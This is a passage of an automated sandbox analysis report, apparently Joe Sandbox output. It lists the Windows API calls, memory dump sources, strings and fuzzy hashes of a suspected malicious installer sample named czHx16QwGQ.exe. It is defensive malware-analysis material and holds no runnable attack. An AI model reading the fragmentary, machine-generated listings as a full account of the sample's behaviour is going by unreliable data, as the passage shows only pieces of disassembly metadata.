                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                • String ID: (7B${
                                                                                                                • API String ID: 590372296-525222780
                                                                                                                • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                                • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                                • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                                • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                                • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                  • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,?,00404A0C), ref: 00405A45
                                                                                                                  • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                                                                                                  • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                                                                                                  • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                                                                                                  • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                  • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                  • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                  • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: (7B$A$Call
                                                                                                                • API String ID: 2624150263-413618503
                                                                                                                • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                                • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                                • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                                • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 7396121B: GlobalAlloc.KERNELBASE(?,?,7396123B,?,739612DF,00000019,739611BE,-000000A0), ref: 73961225
                                                                                                                • GlobalAlloc.KERNEL32(?,00001CA4), ref: 73961C6B
                                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 73961CB3
                                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 73961CBD
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 73961CD0
                                                                                                                • GlobalFree.KERNEL32(?), ref: 73961DB2
                                                                                                                • GlobalFree.KERNEL32(?), ref: 73961DB7
                                                                                                                • GlobalFree.KERNEL32(?), ref: 73961DBC
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 73961FA6
                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 73962140
                                                                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 739621B5
                                                                                                                • LoadLibraryW.KERNEL32(00000008), ref: 739621C6
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 73962220
                                                                                                                • lstrlenW.KERNEL32(00000808), ref: 7396223A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2221579317.0000000073961000.00000020.00000001.01000000.00000004.sdmp, Offset: 73960000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2220811519.0000000073960000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2221828367.0000000073964000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2222689147.0000000073966000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73960000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 245916457-0
                                                                                                                • Opcode ID: ce41b6c76a292eee586bf9fe128fd2ef06c781ef0940fc6ca32bba30b8eecf69
                                                                                                                • Instruction ID: e6183d6f3ad124b3bd6de3a66bc6e0db4a5397b05aa084dd3109ea2f73567965
                                                                                                                • Opcode Fuzzy Hash: ce41b6c76a292eee586bf9fe128fd2ef06c781ef0940fc6ca32bba30b8eecf69
                                                                                                                • Instruction Fuzzy Hash: 4122B972C0660ADFDB16CFA4C9807EEB7B9FB04385F10452ED1A6E7284D7749A808B53
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402183
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInstance
                                                                                                                • String ID:
                                                                                                                • API String ID: 542301482-0
                                                                                                                • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                                • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                                • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                                • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 1974802433-0
                                                                                                                • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                                • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                                • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                                • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                                APIs
                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                                • GetDlgItem.USER32(?,?), ref: 004045D0
                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                • GetDlgItem.USER32(?,?), ref: 004046CC
                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                • SendMessageW.USER32(?,00000000,00000000), ref: 0040477D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                • String ID: Call$N
                                                                                                                • API String ID: 3103080414-3438112850
                                                                                                                • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                                • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                • String ID: F
                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                                • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                  • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                  • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                                • wsprintfA.USER32 ref: 004060B3
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,?,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                                • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                  • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\czHx16QwGQ.exe,80000000,00000003), ref: 00405EE2
                                                                                                                  • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                                • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                                • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                                • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2320649405-0
                                                                                                                • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 2531174081-0
                                                                                                                • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                                • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                                • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                                • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                                APIs
                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                                                                                                • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                                                                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$Prev
                                                                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 589700163-2246974252
                                                                                                                • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                                • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                • wsprintfW.USER32 ref: 00402EF5
                                                                                                                  • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                  • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                  • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                  • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
